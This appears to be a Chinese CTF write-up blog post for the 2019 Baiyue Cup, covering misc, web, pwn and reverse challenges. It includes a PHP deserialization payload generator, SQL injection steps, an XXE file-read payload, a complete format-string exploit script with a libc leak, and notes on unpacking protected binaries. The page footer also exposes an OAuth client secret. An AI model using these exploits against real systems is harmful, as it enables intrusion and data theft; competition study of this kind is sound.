<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>百越杯2019 | oxcccccc</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="bybmisc签到cGxlYXNlIHN1Ym1pdDogZmxhZ3toZWxsb19ieWJ9 base64decode  please submit: flag{hello_byb} key下载附件,用photoshop放大查看,有一条奇奇怪怪的钥匙 用hxd打开图片在图片末尾找到KEY:ISEEU! 提取钥匙中特殊颜色的RGB值与key循环异或 2f3f24 222e13 7f6624 7">
<meta property="og:type" content="article">
<meta property="og:title" content="百越杯2019">
<meta property="og:url" content="http://blog.ccreater.top/2020/04/20/byb2019/index.html">
<meta property="og:site_name" content="oxcccccc">
<meta property="og:description" content="bybmisc签到cGxlYXNlIHN1Ym1pdDogZmxhZ3toZWxsb19ieWJ9 base64decode  please submit: flag{hello_byb} key下载附件,用photoshop放大查看,有一条奇奇怪怪的钥匙 用hxd打开图片在图片末尾找到KEY:ISEEU! 提取钥匙中特殊颜色的RGB值与key循环异或 2f3f24 222e13 7f6624 7">
<meta property="og:locale" content="zh">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006pWR9agy1g8t8ovhhnlj306f05nwf0.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006pWR9agy1g8t8uu1b1yj30jy025jry.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006pWR9agy1g8t8zumovfj309o0aa0t2.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006pWR9agy1g8t93pbylej30em0jjgqg.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006pWR9agy1g8t9ym6aq4j30ka0djwoh.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006pWR9agy1g8t9zwgppwj30kf0e3aj3.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006pWR9agy1g8ta75axdlj30bv036jrd.jpg">
<meta property="article:published_time" content="2020-04-20T12:51:36.059Z">
<meta property="article:modified_time" content="2020-04-20T12:51:51.829Z">
<meta property="article:author" content="ccreater">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://ww1.sinaimg.cn/large/006pWR9agy1g8t8ovhhnlj306f05nwf0.jpg">
  
    <link rel="alternate" href="/atom.xml" title="oxcccccc" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 4.2.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">oxcccccc</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://blog.ccreater.top"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-byb2019" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2020/04/20/byb2019/" class="article-date">
  <time class="dt-published" datetime="2020-04-20T12:51:36.059Z" itemprop="datePublished">2020-04-20</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E6%AF%94%E8%B5%9B/">比赛</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      百越杯2019
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="byb"><a href="#byb" class="headerlink" title="byb"></a>byb</h1><h2 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h2><h3 id="签到"><a href="#签到" class="headerlink" title="签到"></a>签到</h3><p>cGxlYXNlIHN1Ym1pdDogZmxhZ3toZWxsb19ieWJ9</p>
<p>base64decode </p>
<p><code>please submit: flag{hello_byb}</code></p>
<h3 id="key"><a href="#key" class="headerlink" title="key"></a>key</h3><p>下载附件,用photoshop放大查看,有一条奇奇怪怪的钥匙</p>
<p>用hxd打开图片在图片末尾找到KEY:ISEEU!</p>
<p>提取钥匙中特殊颜色的RGB值与key循环异或</p>
<pre><code>2f3f24
222e13
7f6624
713645
7b7e27
723310
646721
76670c
703723
727816
7a6020
213345
7b3277
74375c</code></pre><pre><code class="python">rgb=[&#39;2f&#39;,&#39;3f&#39;,&#39;24&#39;,&#39;22&#39;,&#39;2e&#39;,&#39;13&#39;,&#39;7f&#39;,&#39;66&#39;,&#39;24&#39;,&#39;71&#39;,&#39;36&#39;,&#39;45&#39;,&#39;7b&#39;,&#39;7e&#39;,&#39;27&#39;,&#39;72&#39;,&#39;33&#39;,&#39;10&#39;,&#39;64&#39;,&#39;67&#39;,&#39;21&#39;,&#39;76&#39;,&#39;67&#39;,&#39;0c&#39;,&#39;70&#39;,&#39;37&#39;,&#39;23&#39;,&#39;72&#39;,&#39;78&#39;,&#39;16&#39;,&#39;7a&#39;,&#39;60&#39;,&#39;20&#39;,&#39;21&#39;,&#39;33&#39; ,&#39;45&#39;,&#39;7b&#39;,&#39;32&#39;,&#39;77&#39;,&#39;74&#39;,&#39;37&#39;,&#39;5c&#39;]

key=&quot;ISEEU!&quot;
j=0
for i in rgb:
    print(chr(int(i,16)^ord(key[j])),end=&#39;&#39;)
    j+=1
    j%=6</code></pre>
<p>flag{265a4cd2-b7f1-4d32-9df7-733edfd2a21b}</p>
<h3 id="哈尔的移动城堡"><a href="#哈尔的移动城堡" class="headerlink" title="哈尔的移动城堡"></a>哈尔的移动城堡</h3><p>下载附件得到ori.jpg和102%</p>
<p>用hxd打开后发现</p>
<p><img src="http://ww1.sinaimg.cn/large/006pWR9agy1g8t8ovhhnlj306f05nwf0.jpg" alt="image.png"></p>
<p>这是一张png图片但是文件头错了</p>
<p>划到最后面发现PK</p>
<p>图片里面又藏在压缩包,搜索IEND找到png的最后一个数据块(别问我为啥不用foremost,谁用谁知道)</p>
<p><img src="http://ww1.sinaimg.cn/large/006pWR9agy1g8t8uu1b1yj30jy025jry.jpg" alt="image.png"></p>
<p>又是一个魔改的文件头(正常zip文件头 504B0304 ),手动分离得到zip</p>
<p>emmmm需要密码</p>
<p>用stegsolve发现分离出来的png里藏着二维码</p>
<p>猜测做了蒙版处理</p>
<p>打开ps一段猛如虎()(自闭)的操作后,手动拼接出了二维码</p>
<p><img src="http://ww1.sinaimg.cn/large/006pWR9agy1g8t8zumovfj309o0aa0t2.jpg" alt="image.png"></p>
<p>得到压缩包密码1tsEz_b14ndVV4t3rM4k</p>
<p>解压得到两张图片</p>
<p>用beyondcompare得到flag</p>
<p><img src="http://ww1.sinaimg.cn/large/006pWR9agy1g8t93pbylej30em0jjgqg.jpg" alt="image.png"></p>
<p>flag{3399dcb7-9e15-422f-9bf9-9db30dab70ae}</p>
<h3 id="wireless"><a href="#wireless" class="headerlink" title="wireless"></a>wireless</h3><p>下载得到readme和一个流量</p>
<p>readme</p>
<pre><code>已知密码格式是6666xxxx</code></pre><p>原本试着生成一个所有可打印字符的密码,但是这个也要500m+</p>
<p>所以先用纯数字密码试试</p>
<pre><code class="python">f=open(&quot;dict.txt&quot;,&quot;w&quot;)
for i in range(10**4):
    f.write(&quot;6666%04d\n&quot;%i)
f.close()</code></pre>
<p>用kali的<code>aircrack-ng</code> 来破解通信内容</p>
<p><img src="http://ww1.sinaimg.cn/large/006pWR9agy1g8t9ym6aq4j30ka0djwoh.jpg" alt="image.png"></p>
<p><img src="http://ww1.sinaimg.cn/large/006pWR9agy1g8t9zwgppwj30kf0e3aj3.jpg" alt="image.png"></p>
<p>flag{0566668912-f059-448f}</p>
<p>幸亏没有直接爆所有可打印字符</p>
<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="babyphp"><a href="#babyphp" class="headerlink" title="babyphp"></a>babyphp</h3><pre><code class="php">&lt;?php
error_reporting(1);
class Read {
    private $var;
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }

    public function __invoke(){
        $content = $this-&gt;file_get($this-&gt;var);
        echo $content;
    }
}

class Show
{
    public $source;
    public $str;
    public function __construct($file=&#39;index.php&#39;)
    {
        $this-&gt;source = $file;
        echo $this-&gt;source.&#39;瑙ｆ瀽寮€濮�&#39;.&quot;&lt;br&gt;&quot;;
    }

    public function __toString()
    {

        $this-&gt;str[&#39;str&#39;]-&gt;source;
    }

    public function _show()
    {

        if(preg_match(&#39;/http|https|file:|gopher|dict|\.\.|fllllllaaaaaag/i&#39;,$this-&gt;source)) {
            die(&#39;hacker!&#39;);
        } else {
            highlight_file($this-&gt;source);
        }

    }

    public function __wakeup()
    {
        print(&quot;step1&quot;);
        if(preg_match(&quot;/http|https|file:|gopher|dict|\.\./i&quot;, $this-&gt;source)) {
            echo &quot;hacker~&quot;;
            $this-&gt;source = &quot;index.php&quot;;
        }
    }
}

class Test
{
    public $params;
    public function __construct()
    {
        $this-&gt;params = array();
    }

    public function __get($key)
    {
        $func = $this-&gt;params;
        return $func();
    }  
}

if(isset($_GET[&#39;chal&#39;]))
{
    $chal = unserialize($_GET[&#39;chal&#39;]);
}
else
{
    $show = new Show(&#39;index.php&#39;);
    $show-&gt;_show();
}
?&gt;</code></pre>
<p>%100反序列化链构造</p>
<ol>
<li><p><code>Show::__wake</code>是唯一可以入手的地方</p>
</li>
<li><p>在这个方法中只有$this-&gt;source可以构造pop链的连接点</p>
</li>
</ol>
<p>阅读代码发现<code>Show::__toString</code>会被<code>if(preg_match(&quot;/http|https|file:|gopher|dict|\.\./i&quot;, $this-&gt;source))</code>调用</p>
<ol start="3">
<li><code>Show::__toString</code>:  $this-&gt;str[‘str’]-&gt;source和<code>Test::__get</code>构成链接点</li>
<li><code>Test::__get</code>: <code>$func = $this-&gt;params;return $func();</code>和<code>Read::__invoke</code>构成链接点</li>
<li>而Read()可以任意读取文件</li>
</ol>
<p>payload生成:</p>
<pre><code class="php">&lt;?php
class Show
{
    public $source;
    public $str;
    public function __construct($file=&quot;&quot;)
    {

    }
    public function _show()
    {
        if(preg_match(&#39;/http|https|file:|gopher|dict|\.\.|fllllllaaaaaag/i&#39;,$this-&gt;source)) {
            die(&#39;hacker!&#39;);
        } else {
            highlight_file($this-&gt;source);
        }

    }

    public function __wakeup()
    {
    }
}
class Read {
    private $var=&quot;fllllllaaaaaag.php&quot;;

    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }

    public function __invoke(){
        $content = $this-&gt;file_get($this-&gt;var);
        echo $content;
    }
}
class Test
{
    public $params;
    private $source=&quot;666&quot;;
    public function __construct()
    {
    }
    public function __get($key)
    {
        $func = $this-&gt;params;
        return $func();
    }  
}

$a=new Show();
$b=new Show();
$c=new Test;
//$s-&gt;str[&quot;str&quot;] = $t;

//Read::__invoke
$c-&gt;params=new Read;

//Test::__get
$b-&gt;str[&#39;str&#39;]=$c;

//Show::__tostring
$a-&gt;source=$b;

print(urlencode(serialize($a)));
?&gt;</code></pre>
<p>最后一步就剩flag的文件名,从正则中抠出<code>fllllllaaaaaag</code>但是直接读取,网页500,是文件不存在的结果</p>
<p>一番尝试后flag的文件名<code>fllllllaaaaaag.php</code></p>
<pre><code>&lt;?php
$flag = &quot;flag{df210681-fb10-4c0f-ba25-1f678eb38f85}&quot;;
?&gt;</code></pre><h3 id="babygame"><a href="#babygame" class="headerlink" title="babygame"></a>babygame</h3><p>文件树</p>
<pre><code>index.html
tools.php?hash=
manage.php?showuer
            register
            login
            msgid=1
</code></pre><p>index.html</p>
<p><code>&lt;!-- if you need hash tools, location: tools.php --&gt;</code></p>
<p>flag生成方式</p>
<p><code>flag{md5(name . md5(pass))}</code></p>
<p>网站存在两个cookie: __jsluid_h , PHPSESSID </p>
<p>约束攻击生效,但是无法拿到flag</p>
<p>二次注入测试逃逸引号</p>
<p>宽字节x=&gt;正常回显</p>
<p>%00x=&gt;\0</p>
<p>出现需要转义的地方没有假flag</p>
<p><code>a&#39;#</code>没有flag</p>
<p><code>a\&#39;#</code>出现flag,md5为<code>flag{md5(&quot;a\\\&#39;&quot; . md5(pass))}</code></p>
<p>而直接<code>b\&#39;#</code>是没有flag的,而且与#无关</p>
<p>判断用户时候存在再给一个flag链接</p>
<pre><code>a\\\&#39;#=&gt;a\&#39;#=&gt;select * from xx where user=&#39;$user&#39;?

a\&#39;=&gt;a&#39;,用户不存在

猜测</code></pre><p><code>c\&#39;#</code>=&gt;no flag</p>
<p><code>c&#39;#</code>=&gt;<code>c\&#39;#</code>出现flag(得删除cookie)</p>
<p>注入点就在这</p>
<p>什么代码导致这种结果</p>
<p>登陆时:<code>$_SESSION[x]=query(&quot;select * from xx where user=&#39;&quot;.mysql_real_escape($_POST[&#39;user&#39;]).&quot;&#39; and pass=&#39;&quot;.mysql_real_escape($_POST[&#39;pass&#39;])&quot;).&quot;&#39;&quot;</code></p>
<p><code>query(&quot;select * from xx where user=&#39;$_SESSION[x]&#39;&quot;)</code></p>
<pre><code>user    php($_SESSION) mysql(&#39;$sql&#39;)
a&#39;        a&#39;             a&#39;
a\&#39;        a\&#39;         a\&#39;

</code></pre><p>存在过滤?</p>
<p>依据个数生成flag链接</p>
<p>后面想到为啥注入点不可以是msgid呢</p>
<p>约束攻击获得一个只带有<code>\</code>的账号</p>
<p>注册一个a+’ ‘*28+’”‘ 的账号</p>
<p>msgid处出现注入点</p>
<p><code>or 1%23</code>成功</p>
<p>用sqlmap爆破得到admin的密码拿到tools.php解密得到:<code>ChunQiuGame</code></p>
<p><img src="http://ww1.sinaimg.cn/large/006pWR9agy1g8ta75axdlj30bv036jrd.jpg" alt="image.png"></p>
<p>正常的xxe没啥用,找到一叶飘零的一篇文章</p>
<p><a href="https://www.anquanke.com/post/id/156227" target="_blank" rel="noopener">https://www.anquanke.com/post/id/156227</a></p>
<p>payload:</p>
<pre><code>&lt;root xmlns:xi=&quot;http://www.w3.org/2001/XInclude&quot;&gt;
 &lt;xi:include href=&quot;file:///flag&quot; parse=&quot;text&quot;/&gt;
&lt;/root&gt;</code></pre><p>flag{5ea7d712-e461-4d29-9246-4ea6266775a8}</p>
<p>………………..气死了就差一点拿到flag</p>
<h2 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h2><h3 id="easy-printf"><a href="#easy-printf" class="headerlink" title="easy_printf"></a>easy_printf</h3><p>pwnable.tw原题魔改，<code>bss</code>没有<code>stdin</code>,<code>stdout</code>,<code>stderr</code>了，但是一开始有个询问姓名，不知道有什么用,后来试了各种方法，想到了把<code>stdout</code>的<code>fileno</code>改为<code>2</code>，就可以绕过<code>close(1)</code>了<br>而且刚好</p>
<pre><code class="asm"> ► 0x40089f &lt;func1+57&gt;    mov    eax, 0
   0x4008a4 &lt;func1+62&gt;    call   func2 &lt;0x4007fa&gt;

   0x4008a9 &lt;func1+67&gt;    mov    eax, 0
   0x4008ae &lt;func1+72&gt;    mov    rcx, qword ptr [rbp - 8]
   0x4008b2 &lt;func1+76&gt;    xor    rcx, qword ptr fs:[0x28]
   0x4008bb &lt;func1+85&gt;    je     func1+92 &lt;0x4008c2&gt;

   0x4008bd &lt;func1+87&gt;    call   0x400648

   0x4008c2 &lt;func1+92&gt;    leave  
   0x4008c3 &lt;func1+93&gt;    ret    

   0x4008c4 &lt;main&gt;        push   rbp
   0x4008c5 &lt;main+1&gt;      mov    rbp, rsp
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ rsi rsp  0x7fffc9a192f0 ◂— 0x4141414141414141 (&#39;AAAAAAAA&#39;)
01:0008│          0x7fffc9a192f8 —▸ 0x7fe173507690 (_IO_file_underflow+496) ◂— 0xe8df8948fffffeff
02:0010│          0x7fffc9a19300 —▸ 0x7fe173852540 (_IO_2_1_stderr_) ◂— 0xfbad2087</code></pre>
<p>名字下面残留有<code>stderr</code>，所以读取名字时,<code>partial overwrite</code>改为<code>_IO_2_1_stdout_-&gt;_fileno</code>，然后把<code>_fileno</code>改为2即可，后面的和<code>pwnable.tw</code>没什么区别，有了泄露，也有了无限格式化字符串攻击，随便怎么玩</p>
<p>exp为:</p>
<pre><code class="python">from pwn import *

def fmtstr(offset, addr, data, written):
    cnt = 0
    payload = &#39;&#39;
    address = &#39;&#39;
    for x in data:
        cur = ord(x)
        if cur &gt;= written&amp;0xff:
            to_add = cur - (written&amp;0xff)
        else:
            to_add = 0x100 + cur - (written&amp;0xff)
        round = &#39;&#39;
        if to_add != 0:
            round += &quot;%{}c&quot;.format(to_add)
        round += &quot;%{}$hhn&quot;.format(offset+cnt+len(data)*2)
        assert(len(round) &lt;= 0x10)
        written += to_add + 0x10 - len(round)
        payload += round.ljust(0x10, &#39;_&#39;)
        address += p64(addr+cnt)
        cnt+=1
    return payload + address


def main(host,port=12001):
    if host:
        p = remote(host,port)
    else:
        # p = process(&quot;./easy_printf&quot;,env={&quot;LD_PRELOAD&quot;:&quot;./libc.so&quot;})
        p = process(&quot;./easy_printf&quot;)
        gdb.attach(p,&quot;b *0x000000000400846&quot;)
    p.recvuntil(&quot;write down your name&quot;)
    # t = raw_input(&#39;guess: &#39;)
    t = 0x7
    stdout_fileno = (int(t) &lt;&lt; 12) | 0x690
    p.send(&quot;A&quot;*0x10+p16(stdout_fileno))
    pause()

    buf_addr = 0x601060
    payload =  &quot;%{}c%28$hhn%{}c%58$hn&quot;.format(2,0x2a6).ljust(0x18,&#39;_&#39;)
    payload += fmtstr(9,buf_addr,p64(0x000000000400814)[:3],0x2ab)
    p.send(payload)
    pause()


    payload =  &quot;%{}c%23$hhn%35$p-%36$p^%37$p-%38$p-%39$p*%40$p-&quot;.format(0x14)
    p.send(payload)
    pause()
    p.recvuntil(&quot;^&quot;)
    stack = int(p.recvuntil(&#39;-&#39;,drop=True),16)
    p.recvuntil(&quot;*&quot;)
    libc.address = int(p.recvuntil(&#39;-&#39;,drop=True),16)-0x20837
    info(&quot;stack : &quot; + hex(stack))
    info(&quot;libc : &quot; + hex(libc.address))
    onegadget = 0xf1147+libc.address

    ret_addr = stack - 0x1e8
    payload =  &quot;%{}c%23$hhn&quot;.format(0x14).ljust(0x10,&#39;_&#39;)
    payload += fmtstr(15,ret_addr,p64(onegadget)[:2],0x19)
    p.send(payload)
    pause()
    # :0000000000400865                 retn
    offset = 13
    payload =  &quot;%{}c%16$hhn%{}c%17$hn&quot;.format(ord(p64(onegadget)[2:3]),0x865-ord(p64(onegadget)[2:3])).ljust(0x18,&#39;_&#39;)
    payload += p64(ret_addr+2)+p64(ret_addr-8)
    payload = payload.ljust(0x80,&quot;\x00&quot;)
    p.send(payload)
    p.interactive()
if __name__ == &quot;__main__&quot;:
    libc = ELF(&quot;./libc.so&quot;,checksec=False)
    main(args[&#39;REMOTE&#39;])</code></pre>
<h2 id="reverse"><a href="#reverse" class="headerlink" title="reverse"></a>reverse</h2><h3 id="bwarm"><a href="#bwarm" class="headerlink" title="bwarm"></a>bwarm</h3><p>首先，还是查壳，没啥说的 vmp2.0.7</p>
<p> 根据vmp系列脱壳教程，这个壳是1.8以上的方案进行脱壳。先拖入OD，下一个API断点  VirtualProtect (教程建议是下硬件断点，可能是我的OD有问题，硬件断点断不下来，只能是F2断点了 T_T)</p>
<p>然后F9开始跑，测试到第5次跑飞……</p>
<p>那么就在第四次的时开始候单步跟踪，先跳出VirtualProtect 函数 ，然后对代码段设置，内存访问断点</p>
<p>然后F9继续运行，断下来后，在ESP的地方跟踪内存数据，找到SEH结构化异常的上面35C地址那块，下一个硬件写入断点，并取消之前的内存访问断点</p>
<p>然后继续F9运行，再次断下来，这次再在代码断下内存访问断点，然后多次F9运行，注意观察栈帧的变化，快到SEH的地方就接近OEP了，此时已经跟踪到解压后的代码段，然后进行一下代码分析。</p>
<p>完成分析后，代码就还原了，然后单步跟踪，发现OEP </p>
<p>发现OEP后，同时我们也注意到栈帧部分被压入了3条数据，这个就是VMP偷取的代码，我们需要进行还原，于是在当前位置查找一段 0000000000的内存段</p>
<p>然后，对VMP偷取的代码进行patch。最后跳转到OEP 也就是 jmp 012319C9</p>
<p>接着我们把当前的 01231FB5 设置为新的EIP，就可以进行dump内存操作了，填好起始地址和入口地址后，点击脱壳</p>
<p>把脱壳的文件保存为 dump.exe 然后尝试运行，发现不能运行，直接崩溃掉了</p>
<p>于是猜到可能是重定向表的问题造成，用PE编辑器修改一下这里，然后保存。</p>
<p>再次运行，OK ！！</p>
<p>然后可以载入OD进行动态分析了。</p>
<p>为了方便调试，我们知道程序运行后，会提示输入字符串，那么我们先找到输入字符串的地方。</p>
<p>然后开始单步跟踪到这里，就是完成字符串输入后</p>
<p>继续跟踪，我们发现一个base64的字符串：dQkLdqXP=mLMAa8p=lnncQcq/GEPdGKXcNDl=Mnr=pcoBGPQdG1NA3Aw</p>
<p>那么另外一个字符串就是base64的字典了，也就是：0123456789+/=ABCDEFGHIabcdefghiJKLMNOPQRSTUVWXYZjklmnopqrstuvwxyz</p>
<p>于是，我们就可以根据这个对base64zi’f字符串进行解密：</p>
<p>坑了，竟然是乱码，还以为就这样搞定了呢，后来请教了一下大神，他说是字典有问题，于是我仔细的看了一下，确实</p>
<p>字典里面按说是不应该有‘=’ 这个字符的，按base64的说法这个是占位用的来补足字节数。所以按照大神的指点，我把大神的脚本用C++重新写了一遍（也是为了更好的理解反向分析的过程），终了跑出来了 T_T</p>
<p>最后，就是见证奇迹的时刻到了 * ^_^ *</p>
<p>flag{e38b5b63-4bf7-4ee8-b422-83f599fe0c43}</p>
<h3 id="Md5Jungle"><a href="#Md5Jungle" class="headerlink" title="Md5Jungle"></a>Md5Jungle</h3><p>首先查壳，丢到exeinfope里面一看，发现是asp的壳。</p>
<p>于是用手头的asp脱壳工具尝试脱壳，发现都不行，不是不支持就是报错！没办法，只能老实手工脱壳了。</p>
<p>根据ESP定律+IAT修复+重定向表修复后，脱壳的程序可以正常运行。</p>
<p>用OD载入后，开始单步跟踪</p>
<p>到用户输入界面，我随便输入了个字符串：111111111（9个1）单步跟入到下图，发现了flag字样</p>
<p>这个应该是flag的头，于是继续跟进，发现确实在核对输入数据与flag{比较，这块就过不去了</p>
<p>于是果断的从来，输入数据为 flag{111111111，来到了下图的地方，在0x16的位置比较0x7D 也就是’}’符号</p>
<p>由于C语言的字符串下标是从0开始的，也就是字符串第23个字符处必须是}</p>
<p>于是构造字符串：flag{11111111111111111} 继续跟进，接下来是在0x7、0xc、0x11处核对字符 ‘-‘ (即：0x2D)</p>
<p>于是字符串就变成了flag{11-1111-1111-1111}，继续跟进，发现了一个字符串：01E3421C=dump_SCY.01E3421C (ASCII “c7218260ef2b966ab0454e07c55cf4e9”)<br>感觉像是MD5的字符串，于是用python解了一下，得到： oh，结之前的flag应该就是flag{oh-1111-1111-1111}</p>
<p>再次输入后，继续跟进发现过去了，开始进行第二段的比较得到了下图的错误：</p>
<p>于是反复跟比较算法也没有找到任何有效的数据，结合本题的提示是md5段字节爆破，估计是这块需要进行爆破处理了。</p>
<p>于是继续python大法，得到字符串：flag{oh-aa30-1111-1111}</p>
<p>继续输入后，单步跟进，此时发现一个字符串：堆栈地址=001DFC30, (ASCII “YTkxYQ==”)   eax=786B5459<br>看起来像B64编码，于是尝试解码，得到第三组的flag值：a91a 。</p>
<p>想起之前用od也看过字符串，于是找到第四组的字符串：NGZicA==   ，解码为：4fbp</p>
<p>那么最终的flag就是：flag{oh-aa30-a91a-4fbp}</p>
<h3 id="shy"><a href="#shy" class="headerlink" title="shy"></a>shy</h3><p> 首先查壳，丢到ExeinfoPE里面看一下，确定是upx壳</p>
<p>于是丢到OD里面进行脱壳处理，由于是压缩壳，跟踪起来比较麻烦，我选择了个偷懒的办法，下一个api访问断点</p>
<p>即：VirtualProtect ，运行3次F9后就跑飞了，于是在2次运行后，单步跟踪，到OEP</p>
<p>使用OD自带的插件进行脱壳，注意基址和OEP的关系，计算好后填入</p>
<p>然后点击脱壳，双击发现不能运行。</p>
<p>这个问题估计是重定向造成，于是修复一下重定向表的数据。</p>
<p>保存后，再次运行可以正常跑起来了</p>
<p>再次用OD载入，发现入口地址不是OEP</p>
<p>按说是已经解密完成了，于是我定位到OEP （0x1072940）一看究竟。</p>
<p>确实已经解密，那么为了方便调试，我直接用OD改一下入口代码就可以实现了。</p>
<p>然后把修改完毕的程序，重新保存到文件，由于有重定位会有下图的提示，点击 是 ，然后右键保存一份dump0.exe</p>
<p>继续，OD载入dump0.exe 发现修改成功，可以直接跳转到OEP行，然后单步跟踪，到输入后，发现后面的代码是个加密处理的代码，于是丢到IDA里面看一下这块对应的反编译代码。</p>
<p>buf 就是用户输入的字符串，if ( <em>(&amp;v4 + j) != v79[j] )   这个就是关键的比较，那么V79[]就应该是异或后的结果，也就是ben本题的密钥，于是在OD中定位值：6ljh,!;:+&amp;p%i*a=Sc4#pt</em>%</p>
<p>接下来就简单了，直接把这个密钥输入，然后再次定位到这块就能得到flag了</p>
<p>最终得到flag：flag{cb7670ab-c597-4b17}   输入到shy.exe 验证一下 : )</p>
<p><strong>本文作者</strong>：ccreater<br/><strong>本文地址</strong>： <a href="http://blog.ccreater.top/2020/04/20/byb2019/">http://blog.ccreater.top/2020/04/20/byb2019/</a> <br/><strong>版权声明</strong>：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://blog.ccreater.top/2020/04/20/byb2019/" data-id="cka3ckr2f0019v4v03utuasp8" data-title="百越杯2019" class="article-share-link">Share</a>
      
	  
			  
				  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
  <script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
  <script src="/js/md5.min.js"></script>
<div id="gitalk-container"></div>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '3fd4b7c51e3cfe6d1f43',
        clientSecret: 'e3b1162bfd0bc86431672a764a8c801b4dc97929',
        id: md5(window.location.pathname),
        repo: 'Explorersss.github.io',
        owner: 'Explorersss',
        admin: 'Explorersss',
        distractionFreeMode: 'true'
    })
    gitalk.render('gitalk-container')
</script>
				
	  
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/wp/" rel="tag">wp</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/05/05/4%E6%9C%88%E5%81%9A%E9%A2%98/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          4月做题
        
      </div>
    </a>
  
  
    <a href="/2020/04/20/byb2019%E7%BA%BF%E4%B8%8Bawd/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">百越杯总结</div>
    </a>
  
</nav>

  
</article>




</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/cve%E5%A4%8D%E7%8E%B0/">cve复现</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/">web</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/">做题笔记</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%9D%82/">杂</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%AF%94%E8%B5%9B/">比赛</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F/">渗透</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/">漏洞挖掘</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%BC%96%E7%A8%8B/">编程</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9D%B6%E5%9C%BA/">靶场</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/SpEL/" rel="tag">SpEL</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf-wp/" rel="tag">ctf,wp</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/cve%E5%A4%8D%E7%8E%B0/" rel="tag">cve复现</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/django/" rel="tag">django</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/misc/" rel="tag">misc</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/" rel="tag">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/" rel="tag">python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" 